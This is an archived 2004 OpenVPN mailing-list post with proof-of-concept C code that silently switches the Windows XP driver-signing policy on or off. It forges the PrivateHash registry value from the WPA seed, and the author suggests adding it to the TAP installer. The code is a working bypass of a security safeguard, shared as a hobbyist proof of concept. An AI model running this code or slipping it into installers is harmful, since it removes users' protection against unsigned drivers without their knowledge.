|
|
On Wed, Nov 10, 2004 at 01:38 -0700, Blaine Fleming wrote:
>
> >...but then, I suppose that if you wanted to be evil, you could just
> >find the registry key that GUI setting twiddles, temporarily modify it
> >during the install process and put it back afterwards.
>
> MS made sure it wasn't quite that easy...
> http://support.microsoft.com/?kbid=298503
I felt challenged by the wording in that KB article.
I present you with the attached Proof of concept C Code which can turn
the "Driver Signing" Setting on or off at will. The usual caveats apply
(it works on my machine: XP with SP2). Perhaps someone wants to include
it in the TAP installer :-)
CU,
Sec
--
"The General who in a hundred battles is always victorious is not as
great as the one who achieves his objectives without fighting."
-- Sun Tzu
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#define HP_HASHVALUE HP_HASHVAL
/* This program turns the Driver signing Policy On/Off for Windows XP */
* Written by Stefan `Sec` Zehl <sec@xxxxxx>, 15.11.2004
*
* Thanks to sysinternals.com for regmon and apispy
* to msdn.microsoft.com for windows reference
* to cygwin for their environment
*/
void MyHandleError(char *s){
printf("Error: %s, number %x\n.",s,(unsigned int)GetLastError());
exit(1);
}
//--------------------------------------------------------------------
int main(void){
HCRYPTPROV hCryptProv;
HCRYPTHASH hHash;
BYTE data[16];
DWORD len;
DWORD seed;
HKEY hkey;
BYTE onoff=0; // This is the On/Off toggle
char input[4];
int x;
// HKLM\System\WPA\PnP\seed
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"System\\WPA\\PnP",
0,
KEY_READ,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed);
if(RegQueryValueEx(
hkey,
"seed",
NULL,
NULL,
(BYTE*)&seed,
&len
)==ERROR_SUCCESS){
printf("RegQueryValue sucess\n");
}else{
printf("RegQueryValue failure\n");
};
if(hkey)
RegCloseKey(hkey);
printf("Seed=%x\n",(unsigned int)seed);
printf("Hello, World\n");
if(CryptAcquireContext(
&hCryptProv,
NULL,
NULL,
PROV_RSA_FULL,
0))
{
printf("CryptAcquireContext complete. \n");
} else {
MyHandleError("Acquisition of context failed.");
}
//--------------------------------------------------------------------
// Create a hash object.
if(CryptCreateHash(
hCryptProv,
CALG_MD5,
0,
0,
&hHash))
{
printf("An empty hash object has been created. \n");
} else {
MyHandleError("Error during CryptBeginHash!\n");
}
//--------------------------------------------------------------------
// Compute the cryptographic hash on the data.
input[0]=0;
input[1]=onoff; // This is the Value!
input[2]=0;
input[3]=0;
if(CryptHashData(
hHash,
input,
sizeof(input),
0))
{
printf("The data has been hashed. \n");
} else {
MyHandleError("Error during CPHashData!\n");
}
//--------------------------------------------------------------------
if(CryptHashData(
hHash,
(BYTE*)&seed,
sizeof(seed),
0))
{
printf("The data has been hashed. \n");
} else {
MyHandleError("Error during CPHashData!\n");
}
//--------------------------------------------------------------------
len=sizeof(data);
if( CryptGetHashParam(
hHash,
HP_HASHVALUE,
data,
&len,
0))
{
printf("The hash has been retrieved. \n");
} else {
MyHandleError("Error during CPGetHashParam!\n");
}
//--------------------------------------------------------------------
// Clean up.
// Destroy the hash object.
if(hHash) {
if(!(CryptDestroyHash(hHash)))
MyHandleError("Error during CryptDestroyHash");
}
// Release the CSP.
if(hCryptProv) {
if(!(CryptReleaseContext(hCryptProv,0)))
MyHandleError("Error during CryptReleaseContext");
}
printf("Hash: ");
for(x=0;x<sizeof(data);x++){
printf("%x ",data[x]);
};
printf("\nCreate md5 hash completed without error. \n");
//--------------------------------------------------------------------
// HKLM\Software\Microsoft\Windows\CurrentVersion\Setup\PrivateHash
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed);
if(RegSetValueEx(
hkey,
"PrivateHash",
0,
REG_BINARY,
data,
sizeof(data)
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
//--------------------------------------------------------------------
// HKLM\Software\Microsoft\Driver Signing\Policy
if(RegOpenKeyEx(
HKEY_CURRENT_USER,
"Software\\Microsoft\\Driver Signing",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed);
if(RegSetValueEx(
hkey,
"Policy",
0,
REG_BINARY,
&onoff,
1
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
//--------------------------------------------------------------------
// HKLM\Software\Microsoft\Driver Signing\Policy
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Driver Signing",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed);
if(RegSetValueEx(
hkey,
"Policy",
0,
REG_BINARY,
&onoff,
1
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
exit(0);
}
Warning: require_once(../../../archive_common.php) [function.require-once]: failed to open stream: No such file or directory in /home/openvpn/domains/openvpn.net/public_html/archive/openvpn-users/2004-11/msg00341.html on line 444
Fatal error: require_once() [function.require]: Failed opening required '../../../archive_common.php' (include_path='/usr/local/lib/php') in /home/openvpn/domains/openvpn.net/public_html/archive/openvpn-users/2004-11/msg00341.html on line 444
|